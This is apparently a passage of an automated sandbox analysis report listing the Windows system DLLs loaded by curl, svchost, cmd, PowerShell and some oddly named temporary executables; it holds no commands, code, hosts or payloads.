Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
